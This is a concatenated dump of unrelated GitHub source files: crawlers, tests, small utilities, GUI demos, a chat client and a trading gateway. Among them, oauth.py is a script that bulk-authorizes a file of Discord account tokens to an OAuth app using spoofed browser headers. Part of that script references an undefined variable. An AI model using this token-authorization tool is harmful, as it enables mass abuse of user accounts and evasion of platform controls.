https://www.sankei.com/politics/news/210521/plt2105210030-n1.html\n # https://www.sankei.com/politics/news/210521/plt2105210030-n2.html\n _ = re.compile(r'[^0-9][0-9]{1,3}\\.(html|htm)$')\n if re.search(_, link_parse.path):\n # e.g. 〜n1.html -> 〜n\n link_type2 = _.sub('', link_parse.path)\n crawl_type2 = _.sub('', crawl_target_parse.path)\n # if they match when compared without the trailing extension and page info\n if crawl_type2 == link_type2:\n logger.info(\n f'=== {spider_name} ページネーション(type2) : {link_url}')\n check_flg = True\n\n # if a page number is appended in the query, treat the link as an additional-request target\n # however, the following cases are excluded:\n # - an additional request for the same page has already been made\n # - it is the first page (already requested on the sitemap side)\n # e.g. https://webronza.asahi.com/national/articles/2022042000004.html\n # https://webronza.asahi.com/national/articles/2022042000004.html?a=b&c=d\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=1&a=b&e=f\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=1&m=n&g=h\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=2&a=b&e=f\n # https://webronza.asahi.com/national/articles/2022042000004.html?page=2&m=n&g=h\n if crawl_target_parse.path == link_parse.path:\n # check whether the link query has a key that looks like a page specifier (hoping more than one never matches...)\n page_keys = ['page', 'pagination', 'pager', 'p']\n link_query_selected_items: list[tuple] = []\n for link_query_key, link_query_value in link_query.items():\n if link_query_key in page_keys:\n link_query_selected_items.append(\n (link_query_key, link_query_value))\n\n # if the link has a page-type query,\n for link_query_selected_item in link_query_selected_items:\n check_flg = True\n for same_path_query in pagination_selected_same_path_queries:\n # the key matches\n if link_query_selected_item[0] in same_path_query:\n # excluded if the value matches (same page)\n if link_query_selected_item[1][0] == same_path_query[link_query_selected_item[0]][0]:\n check_flg = False\n # page=1 is excluded\n elif link_query_selected_item[1][0] == str(1):\n check_flg = False\n if check_flg:\n logger.info(\n f'=== {spider_name} ページネーション(type3) : {link_url}')\n\n # save the url that became a crawl target\n if check_flg:\n self.pagination_selected_urls.add(link_url)\n\n return check_flg\n","repo_name":"pubranko/BrownieAtelier","sub_path":"app/news_crawl/spiders/common/pagination_check.py","file_name":"pagination_check.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39940263212","text":"import os\r\nimport re\r\nimport sys\r\nimport requests\r\nimport pandas as pd\r\nimport unicodedata\r\nfrom bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime\r\nfrom pytz import timezone\r\nimport logging\r\nimport logging.handlers\r\n\r\n\r\n\r\ndef extract_from_URL(url):\r\n ''' Extracts the product name and price from the URL and returns a list\r\n\r\n Args:\r\n url (str): URL of the product\r\n\r\n Returns:\r\n list: [product_name, price]\r\n '''\r\n\r\n # Check if URL is valid\r\n if not url.startswith(\"http\"):\r\n return None\r\n \r\n # Create a session object for the requests\r\n session = requests.Session()\r\n\r\n # Make the request using the session object\r\n request = session.get(url)\r\n\r\n # bail out if the request was not successful\r\n if request.status_code != 200:\r\n return None\r\n \r\n # HTML parsing\r\n soup = bs(request.content,'html.parser')\r\n\r\n # Check product name is present on the page\r\n product_name_elem = soup.find(\"span\",{\"class\":\"B_NuCI\"})\r\n if not product_name_elem:\r\n return None\r\n \r\n # Extract and normalize the product name\r\n product_name = 
unicodedata.normalize(\"NFKD\", product_name_elem.get_text())\r\n\r\n # Check if price is present on the page\r\n price_elem = soup.find(\"div\",{\"class\":\"_30jeq3 _16Jk6d\"})\r\n if not price_elem:\r\n return None\r\n \r\n # Extract the price\r\n price = int(''.join(re.findall(r'\\d+', price_elem.get_text())))\r\n \r\n # Get the current time from the timezone\r\n # time_now = datetime.now(timezone(\"Asia/Kolkata\")).strftime('%Y-%m-%d %H:%M')\r\n\r\n return [product_name, price]\r\n\r\nURL= \"https://www.flipkart.com/apple-iphone-14-pro-max-space-black-128-gb/p/itm9aed88fe43457?pid=MOBGHWFHCNVGGMZF&lid=LSTMOBGHWFHCNVGGMZFEEIZN3&marketplace=FLIPKART&q=iphone+14+pro+max&store=tyy%2F4io&srno=s_1_1&otracker=AS_QueryStore_OrganicAutoSuggest_2_9_na_na_na&otracker1=AS_QueryStore_OrganicAutoSuggest_2_9_na_na_na&fm=organic&iid=6e7af0b4-e3cc-48d5-a304-7e8aadce016a.MOBGHWFHCNVGGMZF.SEARCH&ppt=hp&ppn=homepage&ssid=w0apy6ro0g0000001681107610607&qH=37e37d60a349d989\"\r\noutput = extract_from_URL(URL)\r\n\r\n# logger object name specified\r\nlogger = logging.getLogger(output[0])\r\nlogger.setLevel(logging.DEBUG)\r\nlogger_file_handler = logging.handlers.RotatingFileHandler(\r\n \"capture.log\", # name of the file\r\n maxBytes=1024 * 1024,\r\n backupCount=1,\r\n encoding=\"utf8\",\r\n )\r\n\r\n# formatter to log objects\r\nformatter = logging.Formatter(\"%(name)s; %(message)s; %(asctime)s\")\r\nlogger_file_handler.setFormatter(formatter)\r\nlogger.addHandler(logger_file_handler)\r\n\r\n\r\n# log message\r\nlogger.info(int(output[1]))","repo_name":"Pramod07Ch/Price-Tracker-using-GitHub-Actions","sub_path":"log_info.py","file_name":"log_info.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3452697085","text":"#!/usr/bin/python\n\nimport argparse\nfrom collections import namedtuple\n\nSequence = namedtuple('Sequence', ['directions'])\n\n\n# Tile coordinates:\n# - x-axis: positive from northwest to southeast\n# - y-axis: positive from southwest to northeast\nclass Direction(object):\n WEST = (-1, -1)\n EAST = (+1, +1)\n SOUTHWEST = (0, -1)\n SOUTHEAST = (+1, 0)\n NORTHWEST = (-1, 0)\n NORTHEAST = (0, +1)\n\n ALL = [WEST, EAST, SOUTHWEST, SOUTHEAST, NORTHWEST, NORTHEAST]\n\n\ndef parse_sequences(lines):\n result = []\n for line in lines:\n chars = list(line)\n directions = []\n while chars:\n c1 = chars.pop(0)\n if c1 == 'e' or c1 == 'w':\n directions.append(Direction.EAST if c1 ==\n 'e' else Direction.WEST)\n else:\n c2 = chars.pop(0)\n if c1 == 'n':\n directions.append(Direction.NORTHEAST if c2 ==\n 'e' else Direction.NORTHWEST)\n else:\n directions.append(Direction.SOUTHEAST if c2 ==\n 'e' else Direction.SOUTHWEST)\n result.append(Sequence(directions))\n return result\n\n\ndef _compute_starting_state(sequences):\n tiles = {} # coordinates --> is_black\n for seq in sequences:\n coords = (0, 0)\n for d in seq.directions:\n coords = (coords[0] + d[0], coords[1] + d[1])\n tiles[coords] = not tiles.get(coords, False)\n return tiles\n\n\ndef _count_black_tiles(tiles):\n return sum(1 for v in tiles.values() if v)\n\n\ndef count_black_tiles(sequences):\n tiles = _compute_starting_state(sequences)\n return _count_black_tiles(tiles)\n\n\ndef make_beauty_happen(sequences, days):\n tiles = _compute_starting_state(sequences)\n for _ in range(0, days):\n min_x = min(x for x, _ in tiles.keys())\n max_x = max(x for x, _ in tiles.keys())\n min_y = min(y for _, y in tiles.keys())\n max_y = max(y for _, y in 
tiles.keys())\n new_tiles = {}\n for x in range(min_x - 1, max_x + 2):\n for y in range(min_y - 1, max_y + 2):\n black_neighbors_count = 0\n for d in Direction.ALL:\n if tiles.get((x + d[0], y + d[1]), False):\n black_neighbors_count += 1\n is_black = tiles.get((x, y), False)\n new_value = False\n if is_black:\n if black_neighbors_count in [1, 2]:\n new_value = True\n else:\n if black_neighbors_count == 2:\n new_value = True\n new_tiles[(x, y)] = new_value\n tiles = new_tiles\n return _count_black_tiles(tiles)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n parser.add_argument('--next', action='store_true')\n args = parser.parse_args()\n\n with open(args.file, 'r') as input_file:\n lines = [l.strip() for l in input_file.readlines()]\n\n sequences = parse_sequences(lines)\n\n if args.next:\n print(make_beauty_happen(sequences, 100))\n else:\n print(count_black_tiles(sequences))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pylaligand/advent_code_2020","sub_path":"24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18601921559","text":"from gpiozero import PWMOutputDevice, DigitalOutputDevice\n\n\nFORWARD = 1\nOFF = 0\nREVERSE = -1\n\n\nclass DCMotor:\n def __init__(self, pwm, in_1, in_2):\n self.speed = PWMOutputDevice(pin=pwm, frequency=50)\n self.in_1 = DigitalOutputDevice(pin=in_1)\n self.in_2 = DigitalOutputDevice(pin=in_2)\n self.direction = FORWARD\n\n def stop(self):\n self.speed.value = 0\n self.in_1.off()\n self.in_2.off()\n self.direction = OFF\n\n def direction_control(self, direction=None):\n try:\n self.speed.value = 0\n\n if direction is None:\n self.in_1.off()\n self.in_2.off()\n self.direction = OFF\n return True\n\n if direction == FORWARD:\n self.in_1.on()\n self.in_2.off()\n self.direction = FORWARD\n return True\n\n if direction == REVERSE:\n self.in_1.off()\n self.in_2.on()\n self.direction = REVERSE\n return True\n\n except Exception as e:\n print(str(e))\n return False\n","repo_name":"bdschnapp/remote_control_car","sub_path":"src/server/Motor.py","file_name":"Motor.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70871425449","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@Author: github.com/imvast\r\n@Date: 5/24/2023\r\n\"\"\"\r\n\r\nfrom httpx import Client\r\nfrom tls_client import Session\r\nfrom os import system\r\nfrom threading import Thread\r\nfrom colorama import Fore\r\nfrom terminut import printf as print, inputf as input, init; init(colMain=Fore.MAGENTA)\r\n\r\n\r\nclass Oauth:\r\n def __init__(self, uri) -> None:\r\n self.client = Session(client_identifier=\"firefox_111\", random_tls_extension_order=True) \r\n self.session = Client()\r\n self.uri = uri\r\n\r\n def getUris(self):\r\n if \"https://restorecord.com/verify\" in self.uri:\r\n return print(\"RestoreCord Links Not Available Yet. 
Use the link it sends you to after pressing verify.\")\r\n uri = \"https://discord.com\" + monk.split('href=\"https://discord.com')[1].split('\"')[0]\r\n self.oauth_reqstr = uri.split(\"/oauth2\")[0] + \"/api/v9/oauth2\" + self.uri.split(\"/oauth2\")[1]\r\n self.refer_oauth = uri\r\n elif \"oauth2/authorize\" in self.uri and not \"api/v9\" in self.uri:\r\n self.oauth_reqstr = self.uri.split(\"/oauth2\")[0] + \"/api/v9/oauth2\" + self.uri.split(\"/oauth2\")[1]\r\n self.refer_oauth = self.uri\r\n elif \"api/v9\" in self.uri:\r\n self.oauth_reqstr = self.uri\r\n self.refer_oauth = self.uri.replace(\"api/v9\", \"\")\r\n else:\r\n hd = self.session.get(self.uri)\r\n self.oauth_reqstr = hd.headers.get(\"location\") # api.v9\r\n self.refer_oauth = self.session.get(self.oauth_reqstr).text.split(\"\")[0] # https://discord.com/oauth2/authorize?response_type=code&redirect_uri=https%3A%2F%2Fgiveawaysdrops.com%2Fcallback&scope=identify%20guilds.join&client_id=715370284055789585\r\n \r\n def submitOauth(self, res):\r\n if \"location\" in res.text:\r\n locauri = res.json().get(\"location\")\r\n hosturi = locauri.replace(\"https://\", \"\").replace(\"http://\", \"\").split(\"/\")[0]\r\n headers = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\"accept-encoding\": \"gzip, deflate, br\",\"accept-language\": \"en-US,en;q=0.5\",\"connection\": \"keep-alive\",\r\n \"host\": hosturi,\r\n \"referer\": \"https://discord.com/\",\"sec-fetch-dest\": \"document\",\"sec-fetch-mode\": \"navigate\",\"sec-fetch-site\": \"cross-site\",\"sec-fetch-user\": \"?1\", \"upgrade-insecure-requests\": \"1\",\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\"\r\n }\r\n res2 = self.session.get(locauri, headers=headers)\r\n \r\n if res2.status_code in (302, 307):\r\n return print(\"(+) Token Added To OAuth\")\r\n else:\r\n return print(f\"(-) Failed to add token to oauth | {res2.text}, {res2.status_code}\")\r\n elif \"You need to verify your account\" in res.text:\r\n return print(f\"(!) Invalid Token [{token[:25]}...]\")\r\n else:\r\n return print(f\"(!) 
Submit Error | {res.text}\")\r\n \r\n def main(self, token):\r\n self.getUris()\r\n payload = {\r\n \"permissions\": \"0\",\r\n \"authorize\": True\r\n }\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0',\r\n 'Accept': '*/*',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Content-Type': 'application/json',\r\n 'Authorization': token,\r\n 'X-Super-Properties': 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRmlyZWZveCIsImRldmljZSI6IiIsInN5c3RlbV9sb2NhbGUiOiJlbi1VUyIsImJyb3dzZXJfdXNlcl9hZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExMS4wIiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTExLjAiLCJvc192ZXJzaW9uIjoiMTAiLCJyZWZlcnJlciI6IiIsInJlZmVycmluZ19kb21haW4iOiIiLCJyZWZlcnJlcl9jdXJyZW50IjoiIiwicmVmZXJyaW5nX2RvbWFpbl9jdXJyZW50IjoiIiwicmVsZWFzZV9jaGFubmVsIjoic3RhYmxlIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTg3NTk5LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==',\r\n 'X-Discord-Locale': 'en-US',\r\n 'X-Debug-Options': 'bugReporterEnabled',\r\n 'Origin': 'https://discord.com',\r\n 'Connection': 'keep-alive',\r\n 'Referer': self.refer_oauth,\r\n 'Sec-Fetch-Dest': 'empty',\r\n 'Sec-Fetch-Mode': 'cors',\r\n 'Sec-Fetch-Site': 'same-origin',\r\n 'TE': 'trailers',\r\n }\r\n res = self.client.post(self.oauth_reqstr, headers=headers, json=payload)\r\n if res.status_code == 401:\r\n return print(f\"(!) Invalid Token [{token[:25]}...]\")\r\n if res.status_code == 200:\r\n try:\r\n return self.submitOauth(res)\r\n except Exception as e:\r\n return print(f\"(!) Error | {e}\")\r\n else:\r\n return print(f\"(!) Error | {res.text}\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n # url example : http://giveaways.party/login/auth\r\n system(\"cls\")\r\n x1 = Fore.MAGENTA\r\n x2 = Fore.LIGHTMAGENTA_EX\r\n print(\"\"\"\r\n %s╔═╗%s┌─┐┬ ┬┌┬┐┬ ┬%s╔╦╗%s┌─┐┬┌─┌─┐┌┐┌\r\n %s║ ║%s├─┤│ │ │ ├─┤%s ║ %s│ │├┴┐├┤ │││\r\n %s╚═╝%s┴ ┴└─┘ ┴ ┴ ┴%s ╩ %s└─┘┴ ┴└─┘┘└┘\r\n { %sdiscord.gg/vast%s }\r\n %s\"\"\" % (x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, Fore.RESET), showTimestamp=False)\r\n \r\n url = input(\"(?) 
Auth URL > \")\r\n auth = Oauth(uri=url)\r\n \r\n with open('tokens.txt', 'r+') as f: \r\n tokens = f.read().splitlines()\r\n for token in tokens:\r\n Thread(target=auth.main, args=(token,)).start()\r\n","repo_name":"imvast/TokenToOauth","sub_path":"oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"3407053102","text":"import warnings\n\nfrom util import gen_util, plot_util\n\n\n# skip tight layout warning\nwarnings.filterwarnings(\"ignore\", message=\"This figure includes*\")\n\n\nVDASH = (0, (3, 2))\nHDASH = (0, (4, 2))\nDARKRED = \"#871719\"\nNEARBLACK = \"#656565\"\nMOUSE_COL_INTERVAL = 0.3\n\nN_LINPLA = 4\n\n\n#############################################\ndef get_colors(col_name, line=\"L2/3\"):\n \"\"\"\n get_colors(col_name)\n\n Returns exact color for a specific line.\n\n Required args:\n - col_name (str): \n color name\n\n Optional args:\n - line (str): \n line to plot\n default: \"L2/3\"\n \n Returns:\n - col (str): color\n \"\"\"\n \n if line in [\"L23\", \"L23-Cux2\"] :\n col = plot_util.get_color_range(1, col_name)[0]\n elif line in [\"L5\", \"L5-Rbp4\"]:\n col = plot_util.get_color_range(6, col_name)[4]\n else:\n raise ValueError(f\"Line '{line}' not recognized\")\n\n return col\n\n\n#############################################\ndef get_line_plane_name(line=\"L2/3-Cux2\", plane=\"soma\"):\n \"\"\"\n get_line_plane_name()\n\n Returns line/plane short name.\n\n Optional args:\n - line (str):\n line name\n default: \"L2/3-Cux2\"\n - plane (str):\n plane_name\n default: \"soma\"\n\n Returns:\n - line_plane_name (str):\n short name for the line/plane\n \"\"\"\n\n line = line.split(\"-\")[0].replace(\"23\", \"2/3\")\n line_plane_name = f\"{line}-{plane[0].upper()}\"\n\n return line_plane_name\n\n\n#############################################\ndef get_line_plane_idxs(line=\"L23-Cux2\", plane=\"soma\", flat=False):\n \"\"\"\n get_line_plane_idxs()\n\n Returns parameters for a line/plane combination graph.\n\n Optional args:\n - line (str):\n line name\n default: \"L2/3-Cux2\"\n - plane (str):\n plane_name\n default: \"soma\"\n\n Returns:\n if flat:\n - idx (int):\n line/plane index\n \n else:\n - li (int): \n line index\n - pl (int): \n plane index\n\n and in both cases:\n - col (str): \n color hex code\n - dash (tuple or None): \n dash pattern\n \"\"\"\n\n lines, planes = [\"L23-Cux2\", \"L5-Rbp4\"], [\"dend\", \"soma\"]\n pla_col_names = [\"green\", \"blue\"]\n\n if line not in lines:\n gen_util.accepted_values_error(\"line\", line, lines)\n if plane not in planes:\n gen_util.accepted_values_error(\"plane\", plane, planes)\n\n li = lines.index(line)\n pl = planes.index(plane)\n col = get_colors(pla_col_names[pl], line=line)\n dash = VDASH if \"L5\" in line else None\n\n if flat:\n idx = pl + li * len(lines)\n return idx, col, dash\n\n else:\n return li, pl, col, dash\n\n\n","repo_name":"colleenjg/OpenScope_CA_Analysis","sub_path":"plot_fcts/plot_helper_fcts.py","file_name":"plot_helper_fcts.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"5829166760","text":"import pytest\nimport json\nfrom Features.get_booking import get_booking_ids,get_booking_details\n\ntarget_url = \"https://restful-booker.herokuapp.com/booking/\"\n\nbooking_body = {'firstname': 'Feed', \n 'lastname': 'Cuong', \n 'totalprice': 2000, \n 'depositpaid': True, \n 
'bookingdates': {'checkin': '2023-09-01', 'checkout': '2023-08-10'}, \n 'additionalneeds': 'super bowls'}\n\nbooking_data = [(4443, {\n \"firstname\": \"Josh\",\n \"lastname\": \"Allen\",\n \"totalprice\": 111,\n \"depositpaid\": True,\n \"bookingdates\": {\n \"checkin\": \"2018-01-01\",\n \"checkout\": \"2019-01-01\"\n },\n \"additionalneeds\": \"super bowls\"\n}\n)]\n# run get_booking.py to get new booking data\nwith open('booking_data.txt', 'r') as filehandle:\n booking_data2 = json.load(filehandle)\n filehandle.close()\nwith open('create_booking_data.txt', 'r') as filehandle:\n create_booking_data = json.load(filehandle)\n \n\ndef test_get_booking_ids():\n test_response = get_booking_ids()\n for i in test_response:\n booking_key = list(i.keys())\n assert \"bookingid\" == booking_key[0], f\"One of the response have difference key name = {i}\"\n assert i.get(\"bookingid\") > 0, f\"The response have invalid booking id = {i}\"\n\n\ndef test_get_booking_details():\n assert get_booking_details(create_booking_data[0][0]) == booking_body, f\"The booking {create_booking_data[0][0]} has different detail\"\n\n@pytest.mark.parametrize(\"bookingid,booking_body\",booking_data)\ndef test_get_booking_details_with_parametrize(bookingid,booking_body):\n assert get_booking_details(bookingid) == booking_body, f\"The booking {bookingid} has different detail\"\n\n@pytest.mark.parametrize(\"bookingid2,booking_body2\",booking_data2)\ndef test_get_booking_details_with_parametrize2(bookingid2,booking_body2):\n assert get_booking_details(bookingid2) == booking_body2, f\"The booking {bookingid2} has different detail\"\n\n@pytest.mark.parametrize(\"create_booking_id,create_booking_body\",create_booking_data)\ndef test_get_created_booking_details(create_booking_id,create_booking_body):\n assert get_booking_details(create_booking_id) == create_booking_body, f\"The booking {create_booking_id} has different detail\"","repo_name":"dkexe/Python2023","sub_path":"request_training/Tests/test_2_getbooking_detail.py","file_name":"test_2_getbooking_detail.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35552657969","text":"import sys\n\nfrom pages.pages import Pages\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Labs\")\n self.resize(600, 1000)\n layout = QVBoxLayout()\n self.setLayout(layout)\n self.pages = Pages()\n layout.addWidget(self.pages)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec())\n","repo_name":"Yumashev-Nikita/QT_LABS","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6606428812","text":"from datetime import datetime\r\n\r\ndef check_freshness(purchase_date, expiration_date, consumption_date):\r\n try:\r\n purchase_date = datetime.strptime(purchase_date, \"%Y-%m-%d\")\r\n expiration_date = datetime.strptime(expiration_date, \"%Y-%m-%d\")\r\n consumption_date = datetime.strptime(consumption_date, \"%Y-%m-%d\")\r\n\r\n if purchase_date > expiration_date:\r\n print(\"Invalid input: Purchase date cannot be later than the expiration date.\")\r\n return\r\n\r\n if consumption_date < purchase_date:\r\n print(\"Invalid input: Consumption date cannot be earlier than the purchase date.\")\r\n 
return\r\n\r\n freshness_period = expiration_date - purchase_date\r\n days_since_purchase = consumption_date - purchase_date\r\n\r\n if days_since_purchase <= freshness_period:\r\n print(\"The food is fresh.\")\r\n else:\r\n print(\"Warning: The food may not be fresh anymore.\")\r\n print(\"Days since purchase: {}\".format(days_since_purchase.days))\r\n print(\"Freshness period: {} days\".format(freshness_period.days))\r\n\r\n except ValueError:\r\n print(\"Invalid date format. Please use the format YYYY-MM-DD.\")\r\n\r\n# Example usage\r\npurchase_date = \"2023-05-20\"\r\nexpiration_date = \"2023-05-30\"\r\nconsumption_date = \"2023-05-26\"\r\n\r\ncheck_freshness(purchase_date, expiration_date, consumption_date)\r\n","repo_name":"roomaustin/Expiration","sub_path":"expiration.py","file_name":"expiration.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72138886887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hello_django', '0005_auto_20150427_0510'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='answer',\n name='created',\n field=models.DateTimeField(default=datetime.datetime.now),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='answer',\n name='rating',\n field=models.IntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"kirill-m/web-dz","sub_path":"hello_django/migrations/0006_auto_20150427_0520.py","file_name":"0006_auto_20150427_0520.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9162641664","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dynamic_costs', '0005_dynamiccost_apartment'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='dynamiccost',\n old_name='apartment',\n new_name='apartments',\n ),\n ]\n","repo_name":"Happyandhappy/django_email","sub_path":"dynamic_costs/migrations/0006_auto_20141112_1219.py","file_name":"0006_auto_20141112_1219.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13901313335","text":"import sys\nfrom PyQt6.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('My GUI')\n self.setGeometry(50, 50, 500, 500)\n\n self.combo = QComboBox(self)\n self.combo.move(50, 50)\n # self.combo.addItems(['A', 'B', 'C', 'D', 'E', 'F', 'G'])\n self.combo.addItem('Apple', {'a': 'A', 'pop': 400402340})\n self.combo.addItem('Banana', {'b': 'B', 'pop': 400000000})\n self.fruitlabel = QLabel(f'Fruit: {self.combo.itemData(0)[\"pop\"]}', self)\n self.combo.currentIndexChanged.connect(self.combo_changed)\n self.combo.highlighted.connect(self.combo_highlighted)\n\n self.edit_combo = QComboBox(self)\n self.edit_combo.move(200, 50)\n self.edit_combo.setEditable(True)\n self.edit_combo.setDuplicatesEnabled(False)\n self.edit_combo.addItem('Apple', 'a')\n self.edit_combo.addItem('Banana', 'b')\n self.edit_combo.currentIndexChanged.connect(self.edit_combo_changed)\n\n def edit_combo_changed(self, i):\n if not self.edit_combo.itemData(i):\n text, boo = 
QInputDialog.getText(self, 'Add Species Code',\n f'Add species code for {self.edit_combo.itemText(i)}')\n if boo:\n self.edit_combo.setItemData(i, text)\n QMessageBox.information(self, 'Plants', f'You selected {self.edit_combo.itemData(i)}')\n\n def combo_changed(self, i):\n self.fruitlabel.setText(f'Fruit: {self.combo.itemData(i)[\"pop\"]}')\n QMessageBox.information(self, 'Combobox', f'You selected {self.combo.itemData(i)}')\n\n def combo_highlighted(self, i):\n self.fruitlabel.setText(f'HELLO {self.combo.itemText(i)}')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = DlgMain()\n main.show()\n sys.exit(app.exec())\n","repo_name":"throwmeister/gui_experiments","sub_path":"guis/combobox.py","file_name":"combobox.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28965482855","text":"# chat client creation\n#code = utf-8\nfrom socket import *\nimport os, sys\n\ndef recv_msg(s):\n while True:\n data, addr = s.recvfrom(1024)\n # the server sends EXIT to signal exit\n if data.decode()==\"EXIT\":\n sys.exit(0)\n print(data.decode())\n# send messages\ndef send_msg(s, name ,ADDR):\n while True:\n text = input(\"Message: \")\n # entering ## leaves the chat room\n if text ==\"##\":\n msg = \"Q \"+name\n s.sendto(msg.encode(),ADDR)\n sys.exit(\"I have left the chat room\")\n msg = \"C %s %s \"%(name,text)\n s.sendto(msg.encode(),ADDR) \n# create the socket\ndef main():\n # read the IP from the command line\n if len(sys.argv)<3:\n print(\"argv is invalid\")\n return\n HOST = sys.argv[1]# treated as the IP\n PORT = int(sys.argv[2])# treated as the port\n ADDR = (HOST,PORT)\n # create the socket\n s = socket(AF_INET, SOCK_DGRAM)\n while True:\n name = input(\"Enter your name: \")\n msg = \"L \"+name\n # send to the server; the "L " flag lets the server identify the request\n s.sendto(msg.encode(),ADDR)\n # wait for the reply\n data, addr = s.recvfrom(128)\n if data.decode() ==\"ok\":\n print(\"You have joined the chat room!\")\n break\n else:\n print(data.decode())\n # fork parent and child processes\n pid = os.fork()\n if pid < 0:\n sys.exit(\"Failed to create the process!\")\n # send messages\n elif pid ==0:\n send_msg(s,name,ADDR)\n # receive messages\n else:\n recv_msg(s)\n\nmain()","repo_name":"mrliuminlong/note","sub_path":"practise/chatroom/chat_client.py","file_name":"chat_client.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26792344786","text":"# -*- coding:utf-8 -*-\r\n\"\"\"\r\n@FileName :qmt_gateway.py\r\n@Time :2022/11/8 16:49\r\n@Author :fsksf\r\n\"\"\"\r\nfrom collections import defaultdict\r\nfrom typing import Dict, List\r\nfrom vnpy.event import Event, EventEngine\r\nfrom vnpy.trader.event import (\r\n EVENT_TIMER,\r\n EVENT_TICK\r\n)\r\nfrom vnpy.trader.constant import (\r\n Product, Direction, OrderType, Exchange\r\n\r\n)\r\nfrom vnpy.trader.gateway import BaseGateway\r\nfrom vnpy.trader.object import (\r\n OrderRequest,\r\n CancelRequest,\r\n SubscribeRequest,\r\n ContractData,\r\n)\r\n\r\nfrom vnpy_qmt.md import MD\r\nfrom vnpy_qmt.td import TD\r\n\r\n\r\nclass QmtGateway(BaseGateway):\r\n\r\n default_setting: Dict[str, str] = {\r\n \"交易账号\": \"\",\r\n \"mini路径\": \"\"\r\n }\r\n\r\n TRADE_TYPE = (Product.ETF, Product.EQUITY, Product.BOND, Product.INDEX)\r\n exchanges = (Exchange.SSE, Exchange.SZSE)\r\n\r\n def __init__(self, event_engine: EventEngine, gateway_name: str = 'QMT'):\r\n super(QmtGateway, self).__init__(event_engine, gateway_name)\r\n self.contracts: Dict[str, ContractData] = {}\r\n self.md = MD(self)\r\n self.td = TD(self)\r\n self.components: Dict[str, List[\"BasketComponent\"]] = defaultdict(list)\r\n self.count = -1\r\n self.event_engine.register(EVENT_TIMER, 
